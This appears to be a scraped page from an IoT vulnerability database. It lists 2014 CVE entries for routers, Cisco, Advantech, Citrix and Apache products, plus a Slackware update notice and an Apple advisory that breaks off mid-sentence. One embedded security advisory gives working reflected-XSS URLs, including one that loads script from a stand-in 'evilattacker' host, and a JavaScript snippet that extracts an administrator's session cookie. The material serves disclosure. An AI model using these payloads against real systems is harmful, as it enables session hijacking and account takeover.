VARIoT IoT vulnerabilities database


VAR-201407-0183 CVE-2014-4927 ACME micro_httpd used in multiple D-Link and NetGear products: denial-of-service (DoS) vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Buffer overflow in ACME micro_httpd, as used in D-Link DSL2750U and DSL2740U and NetGear WGR614 and MR-ADSL-DG834 routers, allows remote attackers to cause a denial of service (crash) via a long string in the URI in a GET request. ACME micro_httpd is a lightweight HTTP server. Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions. micro_httpd June 2012 is vulnerable; other versions may also be affected. Both D-Link DSL2750U and DSL2740U are router products of D-Link. Both NetGear WGR614 and MR-ADSL-DG834 are router products of NetGear.
VAR-201407-0388 CVE-2014-3325 Cisco Unified Customer Voice Portal Vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Customer Voice Portal (CVP) allow remote attackers to inject arbitrary web script or HTML via a crafted parameter, aka Bug IDs CSCuh61711, CSCuh61720, CSCuh61723, CSCuh61726, CSCuh61727, CSCuh61731, and CSCuh61733. The vendor has confirmed this vulnerability and released it as Bug IDs CSCuh61711, CSCuh61720, CSCuh61723, CSCuh61726, CSCuh61727, CSCuh61731, and CSCuh61733. A third party may inject arbitrary web script or HTML via a crafted parameter. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. These issues are being tracked by Cisco Bug IDs CSCuh61711, CSCuh61720, CSCuh61723, CSCuh61726, CSCuh61727, CSCuh61731, and CSCuh61733.
VAR-201407-0383 CVE-2014-3320 Open redirect vulnerability in the admin web interface of the web framework in Cisco Unified Communications Domain Manager CVSS V2: 5.8
CVSS V3: -
Severity: MEDIUM
Multiple open redirect vulnerabilities in the admin web interface in the web framework in Cisco Unified Communications Domain Manager (CDM) 8.1(.4) and earlier allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via crafted URLs for unspecified scripts, aka Bug ID CSCuo48835. The vendor has confirmed this vulnerability and released it as Bug ID CSCuo48835. Supplementary information: the vulnerability type has been identified as CWE-601: URL Redirection to Untrusted Site (Open Redirect). http://cwe.mitre.org/data/definitions/601.html A third party may redirect any user to an arbitrary web site and conduct a phishing attack via a crafted URL for an unspecified script. An attacker can leverage this issue to conduct phishing attacks; other attacks are possible. This component features scalable, distributed, and highly available enterprise Voice over IP call processing.
VAR-201409-0556 CVE-2014-6064 McAfee Web Gateway Vulnerability in Obtaining Hashed User Password in Account Tab of Admin User Interface CVSS V2: 4.0
CVSS V3: -
Severity: MEDIUM
The Accounts tab in the administrative user interface in McAfee Web Gateway (MWG) before 7.3.2.9 and 7.4.x before 7.4.2 allows remote authenticated users to obtain the hashed user passwords via unspecified vectors. McAfee Web Gateway is prone to a remote information-disclosure vulnerability. Successful exploits may allow attackers to obtain potentially sensitive information that may aid in other attacks. The product provides features such as threat protection, application control, and data loss prevention. A remote attacker could exploit this vulnerability to obtain a user's password hash
VAR-201407-0370 CVE-2014-3306 Arbitrary code execution vulnerability in the web server running on multiple Cisco products CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The web server on Cisco DPC3010, DPC3212, DPC3825, DPC3925, DPQ3925, EPC3010, EPC3212, EPC3825, and EPC3925 Wireless Residential Gateway products allows remote attackers to execute arbitrary code via a crafted HTTP request, aka Bug ID CSCup40808. The Cisco Wireless Residential Gateway is the device for the associated wireless home gateway. Attackers can exploit this issue to inject arbitrary commands and execute arbitrary code with elevated privileges. Failed exploit attempts will crash the web server, denying service to legitimate users. This issue is being tracked by Cisco bug ID CSCup40808. Cisco DPC3010, etc. The following products are affected: Cisco DPC3010, DPC3212, DPC3825, DPC3925, DPQ3925, EPC3010, EPC3212, EPC3825, EPC3925
VAR-201407-0728 No CVE D-Link DNS-320 Ax Remote Command Injection Vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
D-Link DNS-320 Ax is a NAS network storage product from D-Link. A remote command injection vulnerability exists in D-Link DNS-320 Ax running firmware version 2.04b02 and earlier. An attacker could use this vulnerability to execute arbitrary commands in the context of an affected device with root privileges. It may also cause a denial of service. D-Link DNS-320 Ax is prone to an unspecified remote command-injection vulnerability. Failed exploit attempts will likely result in denial-of-service conditions
VAR-201407-0688 No CVE Multiple D-Link products have multiple vulnerabilities CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
The DNR-322L and DNR-326 network video memory is a stand-alone storage device that supports M-JPEG, MPEG4 or H.264 encoding formats. D-Link DNR-322L and DNR-326 are NAS network storage products of D-Link Corporation. D-Link DNR-322L and DNR-326 have authentication bypass, information disclosure, arbitrary firmware upload, and denial of service vulnerabilities. Attackers can use these vulnerabilities to perform unauthorized operations, upload arbitrary firmware, cause denial of service, or disclose sensitive information. D-Link DNR-322L and DNR-326 are prone to an authentication-bypass vulnerability, multiple information-disclosure vulnerabilities, an arbitrary firmware-upload vulnerability, and a denial-of-service vulnerability. This may aid in further attacks.
VAR-201407-0386 CVE-2014-3323 Cisco Unified Contact Center Enterprise Vulnerable to directory traversal CVSS V2: 4.0
CVSS V3: -
Severity: MEDIUM
Directory traversal vulnerability in Cisco Unified Contact Center Enterprise allows remote authenticated users to read arbitrary web-root files via a crafted URL, aka Bug ID CSCun25262. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. This issue is being tracked by Cisco BugId CSCun25262
VAR-201407-0235 CVE-2014-2366 Advantech WebAccess Password Disclosure Vulnerability CVSS V2: 4.0
CVSS V3: -
Severity: HIGH
upAdminPg.asp in Advantech WebAccess before 7.2 allows remote authenticated users to discover credentials by reading HTML source code. This vulnerability allows remote attackers to disclose arbitrary credentials on vulnerable versions of Advantech WebAccess. Authentication is required to exploit this vulnerability. The specific flaw exists within the upAdminPg.asp component. An authenticated user can provide an arbitrary existing account name to this page and receive the account password. An attacker can leverage this vulnerability to then authenticate as the WebAccess Administrator. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess has a password disclosure vulnerability, and its upAdminPg.asp component contains passwords for specific accounts, allowing attackers to exploit vulnerabilities to obtain sensitive information. Advantech WebAccess is prone to a remote information-disclosure vulnerability. This may aid in further attacks. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There are security holes in the upAdminPg.asp script of Advantech WebAccess 7.1 and earlier versions
VAR-201408-0271 CVE-2014-2943 Cobham Aviator satellite terminals contain multiple vulnerabilities CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2014-2886, CVE-2014-2942. Reason: this ID was intended for one issue, but was assigned to two issues by a CNA. Notes: All CVE users should consult CVE-2014-2886 and CVE-2014-2942 to determine which ID is appropriate. All references and descriptions in this candidate have been removed to prevent accidental usage. Cobham Sailor 6000 series satellite terminals contain hardcoded credentials for communicating via the Tbus 2 protocol. ** Deleted ** This case was removed because it was found to duplicate CVE-2014-2942. By calculating the superuser code, an attacker may gain a privileged terminal session and, as a result, may use physical or terminal access to enter the PIN code.
VAR-201407-0384 CVE-2014-3321 Cisco IOS XR Software MPLS Packet Handling Denial of Service Vulnerability CVSS V2: 5.7
CVSS V3: -
Severity: MEDIUM
Cisco IOS XR 4.3.4 and earlier on ASR 9000 devices, when bridge-group virtual interface (BVI) routing is enabled, allows remote attackers to cause a denial of service (chip and card hangs) via a series of crafted MPLS packets, aka Bug ID CSCuo91149. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. A denial of service vulnerability exists in Cisco IOS XR Software MPLS packet processing, allowing an attacker to exploit a vulnerability to initiate a denial of service attack. Cisco IOS XR is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the affected device to crash, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCuo91149
VAR-201407-0464 CVE-2014-4347 Citrix NetScaler Application Delivery Controller and NetScaler Gateway information disclosure vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway (formerly Access Gateway Enterprise Edition) before 9.3-62.4 and 10.x before 10.1-126.12 allows attackers to obtain sensitive information via vectors related to a cookie. Citrix NetScaler Application Delivery Controller is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.

SEC Consult Vulnerability Lab Security Advisory < 20140716-2 >
=======================================================================
              title: Multiple vulnerabilities
            product: Citrix NetScaler Application Delivery Controller
                     Citrix NetScaler Gateway
 vulnerable version: <9.3-62.4
                     <10.1-126.12
      fixed version: >=9.3-62.4
                     >=10.1-126.12
                CVE: CVE-2014-4346, CVE-2014-4347
             impact: High
           homepage: http://www.citrix.com
              found: 2014-01-05
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor/product description:
-----------------------------
"Citrix NetScaler helps organizations build enterprise cloud networks that embody the characteristics and capabilities that define public cloud services, such as elasticity, expandability and simplicity. NetScaler brings to enterprise IT leaders multiple advanced technologies that were previously available only to large public cloud providers."

"As an undisputed leader of service and application delivery, Citrix NetScaler solutions are deployed in thousands of networks around the globe to optimize, secure and control the delivery of all enterprise and cloud services. They deliver 100 percent application availability, application and database server offload, acceleration and advanced attack protection. Deployed directly in front of web and database servers, NetScaler solutions combine high-speed load balancing and content switching, http compression, content caching, SSL acceleration, application flow visibility and a powerful application firewall into a single, easy-to-use platform."

URL: http://www.citrix.com/products/netscaler-application-delivery-controller/overview.html

Business recommendation:
------------------------
Attackers can exploit XSS and other vulnerabilities that lead to cookie disclosure to execute administrative actions. Affected Systems should be updated as soon as possible.

Vulnerability overview/description:
-----------------------------------
1) Cookie disclosure
The error handler in the Apache g_soap module prints all of the request header information including the HTTP Cookie field.

2) Reflected Cross-Site Scripting (XSS)
Citrix Netscaler suffers from multiple reflected Cross-Site Scripting vulnerabilities, which allow an attacker to steal user information, impersonate users and perform administrative actions on the appliance. There are many parameters which are not properly sanitized and thus vulnerable to XSS.

Proof of concept:
-----------------
1) Cookie disclosure
A GET request to the SOAP handler returns the following information:

    GET /soap HTTP/1.1
    Host: <host>
    *OTHER HEADER FIELDS*

Response:

    HTTP/1.1 200 OK
    ...
    Content-Type: text/html

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <HTML>
    ...
    <BODY>
    <H1>mod_gsoap Apache SOAP Server Error</H1>
    <p><strong>No body received</strong>
    ...
    <br>Cookie: SESSID=*SESSION ID*;
    ...

In combination with an XSS vulnerability (see 2) an attacker can use the following code to extract cookies including the SESSID cookie of an administrator:

    var request = new XMLHttpRequest();
    request.open('GET', '/soap', false);
    request.send();
    lines=request.responseText.split('<br>')
    for (var i in lines){
        if (lines[i].indexOf('Cookie')==0){
            alert(lines[i]);
            break;
        }
    }

2) Reflected Cross-Site Scripting
Accessing the following URL will include the Javascript code from http://evilattacker/evil.js:

    http://<host>/menu/topn?name=";<%2fscript><script+src%3d"http:%2f%2fevilattacker%2fevil.js"><%2fscript>

Other pages do not sanitize user input properly as well:

    http://<host>/pcidss/launch_report?type=AA";alert('xss');x="
    http://<host>/menu/guiw?nsbrand=AA<"'>AA&protocol=BB<"'>BB&id=CC<"'>CC

Note: Content-Type is application/x-java-jnlp-file, so the injected script code is not interpreted. However, it is possible to inject arguments into a Java JNLP file, which might be used in further attacks.

Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Citrix NetScaler VPX 10.0, which was the most recent version at the time of discovery. According to the vendor, versions before 10.1-126.12 and 9.3-62.4 are vulnerable.

Vendor contact timeline:
------------------------
2014-01-09: Sending advisory and proof of concept exploit via encrypted channel.
2014-01-17: Vendor acknowledges receipt of advisory.
2014-04-04: Requesting status update.
2014-06-10: Vendor is "in the process of scheduling the release of a security bulletin".
2014-07-07: Requesting list of affected/non-affected versions CVE-IDs.
2014-07-07: Vendor is "still in the final stages of releasing the bulletin".
2014-07-07: Requesting info about cause of delay.
2014-07-07: Vendor is "still hopeful that the bulletin will be available soon".
2014-07-14: Vendor states that fixed version will be available on July 15/16.
2014-07-16: SEC Consult releases coordinated security advisory.

Solution:
---------
Update to a more recent version of Citrix NetScaler. More information can be found at: https://support.citrix.com/article/ctx140863

Workaround:
-----------
No workaround available.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter: Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested in working with the experts of SEC Consult? Write to career@sec-consult.com

EOF Stefan Viehböck / @2014
VAR-201803-0101 CVE-2014-2592 Aruba Web Management portal vulnerable to unrestricted upload of dangerous file types CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
Unrestricted file upload vulnerability in Aruba Web Management portal allows remote attackers to execute arbitrary code by uploading a file with an executable extension. Aruba Web Management portal contains a vulnerability related to unrestricted upload of dangerous file types. Information may be obtained or altered, and service operation may be disrupted (DoS). Aruba Networks is a provider of enterprise 802.11 (Wi-Fi) wireless networking products and security system services. Web Management Portal 6.3.0.60730 is vulnerable; other versions may also be affected.
VAR-201407-0236 CVE-2014-2367 Advantech WebAccess Remote Authentication Bypass Vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: HIGH
The ChkCookie subroutine in an ActiveX control in broadweb/include/gChkCook.asp in Advantech WebAccess before 7.2 allows remote attackers to read arbitrary files via a crafted call. This vulnerability allows remote attackers to bypass authentication requirements on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ChkCookieNoRedir function. By providing arbitrary values to certain fields, an attacker can receive a session authentication cookie despite receiving an error message. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. If user, proj, and scada are set and bwuser is true, multiple restricted pages can be accessed. This may aid in further attacks. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment.
VAR-201407-0515 CVE-2014-0117 Denial-of-service (DoS) vulnerability in the mod_proxy module of Apache HTTP Server CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
The mod_proxy module in the Apache HTTP Server 2.4.x before 2.4.10, when a reverse proxy is enabled, allows remote attackers to cause a denial of service (child-process crash) via a crafted HTTP Connection header. Authentication is not required to exploit this vulnerability. The specific flaw exists within the mod_proxy module. The issue lies in the processing of HTTP headers when an invalid request is made. Successful exploits may allow an attacker to cause an affected application to crash, resulting in a denial-of-service condition. mod_proxy is one of the proxy modules.

Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/httpd-2.4.10-i486-1_slack14.1.txz:  Upgraded.
  See directives DeflateInflateLimitRequestBody, DeflateInflateRatioLimit, and DeflateInflateRatioBurst. [Joe Orton, Eric Covener]
  *) SECURITY: CVE-2014-0231 (cve.mitre.org) mod_cgid: Fix a denial of service against CGI scripts that do not consume stdin that could lead to lingering HTTPD child processes filling up the scoreboard and eventually hanging the server. By default, the client I/O timeout (Timeout directive) now applies to communication with scripts. The CGIDScriptTimeout directive can be used to set a different timeout for communication with scripts. [Rainer Jung, Eric Covener, Yann Ylavic]
  For more information, see:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0117
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0118
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231
  (* Security fix *)
+--------------------------+

Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/httpd-2.2.27-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/httpd-2.2.27-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/httpd-2.2.27-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/httpd-2.2.27-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/httpd-2.2.27-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/httpd-2.2.27-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.10-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.10-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.10-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.10-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.10-i486-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.10-x86_64-1.txz

Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg httpd-2.4.10-i486-1_slack14.1.txz

Then, restart Apache httpd:
# /etc/rc.d/rc.httpd stop
# /etc/rc.d/rc.httpd start

+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004 OS X Yosemite 10.10.3 and Security Update 2015-004 are now available and address the following: Admin Framework Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A process may gain admin privileges without properly authenticating Description: An issue existed when checking XPC entitlements. This issue was addressed with improved entitlement checking. CVE-ID CVE-2015-1130 : Emil Kvarnhammar at TrueSec apache Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in Apache Description: Multiple vulnerabilities existed in Apache versions prior to 2.4.10 and 2.2.29, including one that may allow a remote attacker to execute arbitrary code. These issues were addressed by updating Apache to versions 2.4.10 and 2.2.29 CVE-ID CVE-2013-0118 CVE-2013-5704 CVE-2013-6438 CVE-2014-0098 CVE-2014-0117 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 CVE-2014-3523 ATS Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: Multiple input validation issues existed in fontd. These issues were addressed through improved input validation. CVE-ID CVE-2015-1131 : Ian Beer of Google Project Zero CVE-2015-1132 : Ian Beer of Google Project Zero CVE-2015-1133 : Ian Beer of Google Project Zero CVE-2015-1134 : Ian Beer of Google Project Zero CVE-2015-1135 : Ian Beer of Google Project Zero Certificate Trust Policy Impact: Update to the certificate trust policy Description: The certificate trust policy was updated. The complete list of certificates may be viewed at https://support.apple.com/en- us/HT202858. 
CFNetwork HTTPProtocol Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Cookies belonging to one origin may be sent to another origin Description: A cross-domain cookie issue existed in redirect handling. Cookies set in a redirect response could be passed on to a redirect target belonging to another origin. The issue was address through improved handling of redirects. CVE-ID CVE-2015-1089 : Niklas Keller CFNetwork Session Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Authentication credentials may be sent to a server on another origin Description: A cross-domain HTTP request headers issue existed in redirect handling. The issue was addressed through improved handling of redirects. CVE-ID CVE-2015-1091 : Diego Torres (http://dtorres.me) CFURL Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: An input validation issue existed within URL processing. This issue was addressed through improved URL validation. CVE-ID CVE-2015-1088 : Luigi Galli CoreAnimation Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A use-after-free issue existed in CoreAnimation. This issue was addressed through improved mutex management. CVE-ID CVE-2015-1136 : Apple FontParser Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the processing of font files. These issues were addressed through improved bounds checking. 
CVE-ID CVE-2015-1093 : Marc Schoenefeld Graphics Driver Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A NULL pointer dereference existed in NVIDIA graphics driver's handling of certain IOService userclient types. This issue was addressed through additional context validation. CVE-ID CVE-2015-1137 : Frank Graziano and John Villamil of the Yahoo Pentest Team Hypervisor Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local application may be able to cause a denial of service Description: An input validation issue existed in the hypervisor framework. This issue was addressed through improved input validation. CVE-ID CVE-2015-1138 : Izik Eidus and Alex Fishman ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted .sgi file may lead to arbitrary code execution Description: A memory corruption issue existed in the handling of .sgi files. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1139 : Apple IOHIDFamily Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A malicious HID device may be able to cause arbitrary code execution Description: A memory corruption issue existed in an IOHIDFamily API. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1095 : Andrew Church IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A buffer overflow issue existed in IOHIDFamily. This issue was addressed through improved memory handling. 
CVE-ID CVE-2015-1140 : lokihardt@ASRT working with HP's Zero Day Initiative, Luca Todesco IOHIDFamily Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to determine kernel memory layout Description: An issue existed in IOHIDFamily that led to the disclosure of kernel memory content. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1096 : Ilja van Sprundel of IOActive IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A heap buffer overflow existed in IOHIDFamily's handling of key-mapping properties. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4404 : Ian Beer of Google Project Zero IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A null pointer dereference existed in IOHIDFamily's handling of key-mapping properties. This issue was addressed through improved validation of IOHIDFamily key-mapping properties. CVE-ID CVE-2014-4405 : Ian Beer of Google Project Zero IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A user may be able to execute arbitrary code with system privileges Description: An out-of-bounds write issue exited in the IOHIDFamily driver. The issue was addressed through improved input validation. CVE-ID CVE-2014-4380 : cunzhang from Adlab of Venustech Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause unexpected system shutdown Description: An issue existed in the handling of virtual memory operations within the kernel. The issue is fixed through improved handling of the mach_vm_read operation. 
CVE-ID CVE-2015-1141 : Ole Andre Vadla Ravnas of www.frida.re Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause a system denial of service Description: A race condition existed in the kernel's setreuid system call. This issue was addressed through improved state management. CVE-ID CVE-2015-1099 : Mark Mentovai of Google Inc. Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local application may escalate privileges using a compromised service intended to run with reduced privileges Description: setreuid and setregid system calls failed to drop privileges permanently. This issue was addressed by correctly dropping privileges. CVE-ID CVE-2015-1117 : Mark Mentovai of Google Inc. Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: An attacker with a privileged network position may be able to redirect user traffic to arbitrary hosts Description: ICMP redirects were enabled by default on OS X. This issue was addressed by disabling ICMP redirects. CVE-ID CVE-2015-1103 : Zimperium Mobile Security Labs Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: An attacker with a privileged network position may be able to cause a denial of service Description: A state inconsistency existed in the processing of TCP headers. This issue was addressed through improved state handling. CVE-ID CVE-2015-1102 : Andrey Khudyakov and Maxim Zhuravlev of Kaspersky Lab Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: An out of bounds memory access issue existed in the kernel. This issue was addressed through improved memory handling.
CVE-ID CVE-2015-1100 : Maxime Villard of m00nbsd Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may be able to bypass network filters Description: The system would treat some IPv6 packets from remote network interfaces as local packets. The issue was addressed by rejecting these packets. CVE-ID CVE-2015-1104 : Stephen Roettger of the Google Security Team Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1101 : lokihardt@ASRT working with HP's Zero Day Initiative Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may be able to cause a denial of service Description: A state inconsistency issue existed in the handling of TCP out of band data. This issue was addressed through improved state management. CVE-ID CVE-2015-1105 : Kenton Varda of Sandstorm.io LaunchServices Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause the Finder to crash Description: An input validation issue existed in LaunchServices's handling of application localization data. This issue was addressed through improved validation of localization data. CVE-ID CVE-2015-1142 LaunchServices Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A type confusion issue existed in LaunchServices's handling of localized strings. This issue was addressed through additional bounds checking. 
CVE-ID CVE-2015-1143 : Apple libnetcore Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted configuration profile may lead to unexpected application termination Description: A memory corruption issue existed in the handling of configuration profiles. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1118 : Zhaofeng Chen, Hui Xue, Yulong Zhang, and Tao Wei of FireEye, Inc. ntp Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may brute force ntpd authentication keys Description: The config_auth function in ntpd generated a weak key when an authentication key was not configured. This issue was addressed by improved key generation. CVE-ID CVE-2014-9298 OpenLDAP Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A remote unauthenticated client may be able to cause a denial of service Description: Multiple input validation issues existed in OpenLDAP. These issues were addressed by improved input validation. CVE-ID CVE-2015-1545 : Ryan Tandy CVE-2015-1546 : Ryan Tandy OpenSSL Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in OpenSSL Description: Multiple vulnerabilities existed in OpenSSL 0.9.8zc, including one that may allow an attacker to intercept connections to a server that supports export-grade ciphers. These issues were addressed by updating OpenSSL to version 0.9.8zd. 
CVE-ID CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8275 CVE-2015-0204 Open Directory Client Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A password might be sent unencrypted over the network when using Open Directory from OS X Server Description: If an Open Directory client was bound to an OS X Server but did not install the certificates of the OS X Server, and then a user on that client changed their password, the password change request was sent over the network without encryption. This issue was addressed by having the client require encryption for this case. CVE-ID CVE-2015-1147 : Apple PHP Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in PHP Description: Multiple vulnerabilities existed in PHP versions prior to 5.3.29, 5.4.38, and 5.5.20, including one which may have led to arbitrary code execution. This update addresses the issues by updating PHP to versions 5.3.29, 5.4.38, and 5.5.20. CVE-ID CVE-2013-6712 CVE-2014-0207 CVE-2014-0237 CVE-2014-0238 CVE-2014-2497 CVE-2014-3478 CVE-2014-3479 CVE-2014-3480 CVE-2014-3487 CVE-2014-3538 CVE-2014-3587 CVE-2014-3597 CVE-2014-3668 CVE-2014-3669 CVE-2014-3670 CVE-2014-3710 CVE-2014-3981 CVE-2014-4049 CVE-2014-4670 CVE-2014-4698 CVE-2014-5120 QuickLook Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Opening a 